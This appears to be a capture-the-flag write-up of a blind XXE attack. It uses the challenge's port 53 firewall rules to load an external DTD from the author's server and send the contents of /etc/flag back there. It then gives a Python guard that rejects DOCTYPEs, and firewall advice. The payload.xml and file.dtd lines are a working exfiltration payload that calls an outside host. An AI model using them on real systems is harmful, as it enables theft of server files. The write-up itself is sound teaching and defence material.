The firewall rules file, iptables.sh, contains the following:

```bash
## This should be one of the first rules.
## so dns lookups are already allowed for your other rules
$IPT -A OUTPUT -p udp --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
$IPT -A INPUT -p udp --sport 53 -m state --state ESTABLISHED -j ACCEPT
$IPT -A OUTPUT -p tcp --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
$IPT -A INPUT -p tcp --sport 53 -m state --state ESTABLISHED -j ACCEPT
```
Input and output on port 53 are allowed, over both UDP and TCP, so we can take advantage of this rule.

We will send the payload through the challenge page.

On our server, let's start an HTTP server on port 53.
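start_server.sh

```bash
# Print this server's public IP (the address used in the payload URLs)
echo "$(curl -s ifconfig.me/ip)"
# Stop systemd-resolved so that port 53 is free
systemctl stop systemd-resolved
# Serve the current directory (file.dtd) over HTTP on port 53
php -S 0.0.0.0:53
```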
payload.xml

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://51.158.67.1:53/file.dtd">
<data>&send;</data>
```
file.dtd

```xml
<!ENTITY % file SYSTEM "file:///etc/flag">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://51.158.67.1:53/?%file;'>">
%all;
```
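On the defensive side, the payload above only works if the application's XML parser accepts a DOCTYPE and loads the external DTD. The following is an added example, not code from the challenge or the original writeup: a Python pre-parse guard that rejects any document carrying a DOCTYPE. The names `parse_untrusted`, `RejectedXML` and `is_rejected` are hypothetical, and the sample input is constructed to mirror payload.xml with a documentation address.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class RejectedXML(ValueError):
    """Raised when untrusted XML is malformed or carries a DOCTYPE."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Entity declarations and external DTDs can only come from a DOCTYPE,
    # so refusing it removes the whole XXE surface.
    raise RejectedXML(f"DOCTYPE not allowed (root={name!r}, system={system_id!r})")


def parse_untrusted(data: bytes) -> ET.Element:
    """Return the parsed tree only if the document has no DOCTYPE."""
    guard = expat.ParserCreate()
    guard.StartDoctypeDeclHandler = _reject_doctype
    try:
        guard.Parse(data, True)  # the handler's exception propagates from here
    except expat.ExpatError as exc:
        raise RejectedXML(f"malformed XML: {exc}") from exc
    return ET.fromstring(data)


def is_rejected(data: bytes) -> bool:
    try:
        parse_untrusted(data)
    except RejectedXML:
        return True
    return False


# Constructed sample shaped like payload.xml (192.0.2.10 is a documentation address).
SAMPLE_PAYLOAD = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://192.0.2.10:53/file.dtd">
<data>&send;</data>"""

# Constructed benign request body.
SAMPLE_BENIGN = b"<data>hello</data>"

if __name__ == "__main__":
    for label, doc in (("payload", SAMPLE_PAYLOAD), ("benign", SAMPLE_BENIGN)):
        print(label, "rejected" if is_rejected(doc) else "accepted")
```

Independently of the parser fix, limiting the port 53 rules in iptables.sh to the resolver's address (with `-d` on OUTPUT and `-s` on INPUT) would stop the application host from reaching an arbitrary server on that port.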